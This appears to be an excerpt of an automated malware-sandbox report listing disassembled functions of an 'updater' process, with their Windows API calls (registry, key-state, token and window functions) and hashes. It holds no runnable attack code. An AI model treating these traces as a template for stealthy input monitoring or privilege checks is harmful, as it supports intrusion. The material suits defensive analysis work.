Instruction ID: 3b256bfbff112a000c90d9ee9704a1810a9fcea0432d656e1d118973ed4cde20
Opcode Fuzzy Hash: 16be595af307c0585abec383290f374cdecc3225340434a9da0009828c06f1cb
Instruction Fuzzy Hash: EB115E38900118DFCF46EF94D9A1AEFB7B8FF16344F108469D815AB261EB3A5E06CB50

Function 0038F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0038F2F0
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0038F320
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0038F453
CloseHandle.KERNEL32(?), ref: 0038F4D4

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 24b144393a1fcea5584ec9b083734704d37abfd576c69b5950dc2313c4d72138
Instruction ID: 152b1c9c512dea25ffa553339871187f2735b67e3191e91a68c1d41e5cd5cff7
Opcode Fuzzy Hash: 24b144393a1fcea5584ec9b083734704d37abfd576c69b5950dc2313c4d72138
Instruction Fuzzy Hash: A481A3B16003009FD726EF29D882F6AB7E5AF4C710F14885DF999DB392D7B0AC818B51

Function 00390697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 0039147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039040D,?,?), ref: 00391491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0039075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0039079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003907E3
RegCloseKey.ADVAPI32(?,?), ref: 0039080F
RegCloseKey.ADVAPI32(00000000), ref: 0039081C

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 1a0e603eb1ff8a64fa45b95e4f38327438712b14a25464584ff7fe5da74561f3
Instruction ID: 26bd5241558d82a4cbf75161ab723df42136cc5580615de0eaf85902c383f615
Opcode Fuzzy Hash: 1a0e603eb1ff8a64fa45b95e4f38327438712b14a25464584ff7fe5da74561f3
Instruction Fuzzy Hash: 44515E71208205AFDB0AEF64C981F6BB7E9FF89314F00891DF5958B291DB30E945CB92

Function 0037EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0037EC62
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0037EC8B
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0037ECCA

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0037ECEF
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0037ECF7

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 4abf75187f54d0b9fc6fe4a5a15f0974fe41195fd1bd3b8548cb0e228479cac7
Instruction ID: 0e50de9527a73dadc2383d555578993ea8793fe81a274089341f1570e6f50117
Opcode Fuzzy Hash: 4abf75187f54d0b9fc6fe4a5a15f0974fe41195fd1bd3b8548cb0e228479cac7
Instruction Fuzzy Hash: AB513875A00209DFCB16EF64D985AAEBBF5EF0D310B148099E849AF362DB31ED51CB50

Function 0039A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdd54597e5e1f4ec96bd9011f0b1344e4ac45cae55dbaa69bad39fc580e15e96
Instruction ID: a94ed029f5030d18f05ab0dbf58e56ff56a978bdec342f7c5f68620b468d2f66
Opcode Fuzzy Hash: fdd54597e5e1f4ec96bd9011f0b1344e4ac45cae55dbaa69bad39fc580e15e96
Instruction Fuzzy Hash: 38410635900514AFDF16DBE8CC86FA9BBB8EB0A310F160355F816A72D1D7309D41DAD1

Function 00312714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00312727
ScreenToClient.USER32(003D77B0,?), ref: 00312744
GetAsyncKeyState.USER32(00000001), ref: 00312769
GetAsyncKeyState.USER32(00000002), ref: 00312777

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 17dc50d97f5d9ced29e08eeca3f9f91e058d2f727364e3b7b801f074c6825e69
Instruction ID: 08dc51057ce585f09c5928f55bff54825c888513ec02bf088bc2444a432600cb
Opcode Fuzzy Hash: 17dc50d97f5d9ced29e08eeca3f9f91e058d2f727364e3b7b801f074c6825e69
Instruction Fuzzy Hash: 05418235505109FFDF1B9FA8C844AEABBB4FB0A324F108319F824962D1C734ADA0DB91

Function 003695D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 003695E8
PostMessageW.USER32(?,00000201,00000001), ref: 00369692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0036969A
PostMessageW.USER32(?,00000202,00000000), ref: 003696A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003696B0

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: b076680e711869048d7aac844f13b987f50662a41edc0209c57672514d80a122
Instruction ID: 51c03a40fbb41534bd7f2c35e534161c8d843058b6ab75eb4a09f6e1fcf2e44f
Opcode Fuzzy Hash: b076680e711869048d7aac844f13b987f50662a41edc0209c57672514d80a122
Instruction Fuzzy Hash: 6731EE31900319EFDB15CFA8D94CB9E7BB9FB45325F11821AF824AB1D0C3B09920DB90

Function 0039B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

GetWindowLongW.USER32(01561598,000000F0), ref: 0039B804
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0039B829
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0039B841
GetSystemMetrics.USER32(00000004), ref: 0039B86A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0038155C,00000000), ref: 0039B888

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: b2bd6b06c1e31a975a725a1864de712d06def842329a8a2753b5bbba6af77f22
Instruction ID: 479f08013ad679cc2d427c51e149b8025cacf2622bc439f9e15c92381cbe77d2
Opcode Fuzzy Hash: b2bd6b06c1e31a975a725a1864de712d06def842329a8a2753b5bbba6af77f22
Instruction Fuzzy Hash: 2521B131918265AFCF169F38ED08A6A77ACFB09320F114729F925D21E0E3309810CB80

Function 00386138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00386159
GetForegroundWindow.USER32 ref: 00386170
GetDC.USER32(00000000), ref: 003861AC
GetPixel.GDI32(00000000,?,00000003), ref: 003861B8
ReleaseDC.USER32(00000000,00000003), ref: 003861F3

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 2d662f5669174f95ac8e5ceeefdc0f1e904e4c3fb2cfa164a155df17b4598bae
Instruction ID: 49e3f5ea07e17142a3d088f8c70e9732ea8d050588263a101f186a56f4b0f384
Opcode Fuzzy Hash: 2d662f5669174f95ac8e5ceeefdc0f1e904e4c3fb2cfa164a155df17b4598bae
Instruction Fuzzy Hash: C421A475A006049FD719EF65DD89A9AB7F9EF8D310F048479E84A97262CA30AC40CB90

Function 003116CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00311729
SelectObject.GDI32(?,00000000), ref: 00311738
BeginPath.GDI32(?), ref: 0031174F
SelectObject.GDI32(?,00000000), ref: 00311778

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 2a13b5532c9d58feca790cb2271aa76bacfac2f45279a1f0cf3627fc7fe4d931
Instruction ID: 9f34ce52b2ced5683adae2451d3cb1b79f6718521425deafad49a475335bad49
Opcode Fuzzy Hash: 2a13b5532c9d58feca790cb2271aa76bacfac2f45279a1f0cf3627fc7fe4d931
Instruction Fuzzy Hash: AF21AC30906218EBDB27DF24EC4ABED7BACFB08321F154217F915962E0E7719891DB90

Function 0036C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0036C84C
_memcmp.LIBCMT ref: 0036C86A
_memcmp.LIBCMT ref: 0036C87D
_memcmp.LIBCMT ref: 0036C895
_memcmp.LIBCMT ref: 0036C8AD

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 816d0e7134389a9a725a215628b6fcdd7922b36c143e35791a5782a39ae71bcf
Instruction ID: 2fdf0f8bee4061cc41f911af80cb32228f6cda4753fde0a9d73e3852dad86de9
Opcode Fuzzy Hash: 816d0e7134389a9a725a215628b6fcdd7922b36c143e35791a5782a39ae71bcf
Instruction Fuzzy Hash: 6D01B162A501057BE22766529C82FFB736CEE61394F04C125FE469B74AE7A0DE1182F0

Function 0037504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00375075
__beginthreadex.LIBCMT ref: 00375093
MessageBoxW.USER32(?,?,?,?), ref: 003750A8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003750BE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003750C5

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 5d82fe1f70c4291e65d7959a668835ce8448ca6d9e466b7a60741f281ce06867
Instruction ID: 221737c258b62b0bddedcdc05308c891b44b92a961deb886072a6ccaff905a84
Opcode Fuzzy Hash: 5d82fe1f70c4291e65d7959a668835ce8448ca6d9e466b7a60741f281ce06867
Instruction Fuzzy Hash: A9110876908758BFC7178BA8AC48ADB7BACEB46320F144256F819D3350D6B58D0487F0

Function 016D95C9 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,016D9660,?,?,00000000), ref: 016D95E1

Part of subcall function 016D9341: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 016D935F

GetThreadLocale.KERNEL32(00000000,00000004,00000000,016D9660,?,?,00000000), ref: 016D9611
EnumCalendarInfoA.KERNEL32(Function_0000C515,00000000,00000000,00000004), ref: 016D961C
GetThreadLocale.KERNEL32(00000000,00000003,00000000,016D9660,?,?,00000000), ref: 016D963A
EnumCalendarInfoA.KERNEL32(Function_0000C551,00000000,00000000,00000003), ref: 016D9645

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 4d88f254f898e1a16e02f31c366562dedfa8c36c9eb54a8d1f682dd473b3d72b
Instruction ID: fdf770d609c8da5e0027ac523b5579602dd34bd4ebcddd5d6dd45be733e2da79
Opcode Fuzzy Hash: 4d88f254f898e1a16e02f31c366562dedfa8c36c9eb54a8d1f682dd473b3d72b
Instruction Fuzzy Hash: EA012631E002557FE601BEB4CC11F5A726DDB56718F920268F412D7AC0EA749E00C2E9

Function 00368E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00368E3C
GetLastError.KERNEL32(?,00368900,?,?,?), ref: 00368E46
GetProcessHeap.KERNEL32(00000008,?,?,00368900,?,?,?), ref: 00368E55
HeapAlloc.KERNEL32(00000000,?,00368900,?,?,?), ref: 00368E5C
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00368E73

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: f54c51148a0a5e99abb894f3c1dca40cd08fffe06f3fe8fae2ece4c76903b56a
Instruction ID: 0350be4c28caf22318a98916646c9996a7dd8c7fcd5313d64ccd6f6a72226978
Opcode Fuzzy Hash: f54c51148a0a5e99abb894f3c1dca40cd08fffe06f3fe8fae2ece4c76903b56a
Instruction Fuzzy Hash: 1B0181B4241204BFDB264FA5DC48DAB7FADEF8B354B104629F849C2220DB329C10CAA0

Function 003757FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0037581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00375829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00375831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0037583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00375877

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: c6581bfa9530828d95bad02d0f2f7d21cff5e6bcf6a2c692ada05f3be6582c08
Instruction ID: 90681216531d20b0cc6582942e21707898569a1ca10c9688adf3a124e522d983
Opcode Fuzzy Hash: c6581bfa9530828d95bad02d0f2f7d21cff5e6bcf6a2c692ada05f3be6582c08
Instruction Fuzzy Hash: 4F016D35E01A2DEBCF1A9FE4D848AEDBBBCFB0A711F018559E505B2140CB749550CBA2

Function 00368CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00368CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00368CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00368CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00368CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00368D14

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 7d7c39919f9e7a42a4e9d18d27422b86d87bc475fa85bcf19b13ae71ecfe23b5
Instruction ID: 554308314a6ecdf04680412331eee6e86a582d8922e6a682700f66d4a16bf3d0
Opcode Fuzzy Hash: 7d7c39919f9e7a42a4e9d18d27422b86d87bc475fa85bcf19b13ae71ecfe23b5
Instruction Fuzzy Hash: 58F04F35200204AFEF164FA59C89EAB3BADEF4A754F108525FA45C6190CB619C41DB70

Function 00368D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00368D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00368D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00368D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00368D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00368D75

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 746c7d5bf9c90837745eb9937cb36f285f2ae73bfe3666e332a5e06d2ed6ee9f
Instruction ID: e711be16bf7b5f39c4139491d0dedfe7c90e25bf45d10e90e56bae8605bb4158
Opcode Fuzzy Hash: 746c7d5bf9c90837745eb9937cb36f285f2ae73bfe3666e332a5e06d2ed6ee9f
Instruction Fuzzy Hash: 6CF0AF74200204AFEB120FA4EC88FAB3BACEF4E758F044615F944C21A0CBB09D00DB70

Function 0036CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0036CD90
GetWindowTextW.USER32(00000000,?,00000100), ref: 0036CDA7
MessageBeep.USER32(00000000), ref: 0036CDBF
KillTimer.USER32(?,0000040A), ref: 0036CDDB
EndDialog.USER32(?,00000001), ref: 0036CDF5

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 6c9b764b9556e865a0b4af17319d1182f31f128f89b715581fea70e984c0715e
Instruction ID: 97e57d710a6a8190c110467e5b129d7e4468c43bbd10193baac0479e9703962d
Opcode Fuzzy Hash: 6c9b764b9556e865a0b4af17319d1182f31f128f89b715581fea70e984c0715e
Instruction Fuzzy Hash: 7801D130510708ABEB265F20DD8EBB67BBCFB01705F004669F5C2A14E1DBF0A9548B80

Function 0031178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0031179B
StrokeAndFillPath.GDI32(?,?,0034BBC9,00000000,?), ref: 003117B7
SelectObject.GDI32(?,00000000), ref: 003117CA
DeleteObject.GDI32 ref: 003117DD
StrokePath.GDI32(?), ref: 003117F8

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
